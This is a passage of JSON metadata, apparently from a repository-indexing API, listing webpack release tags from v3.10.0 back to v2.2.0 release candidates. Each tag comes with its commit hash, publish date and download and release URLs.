49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/web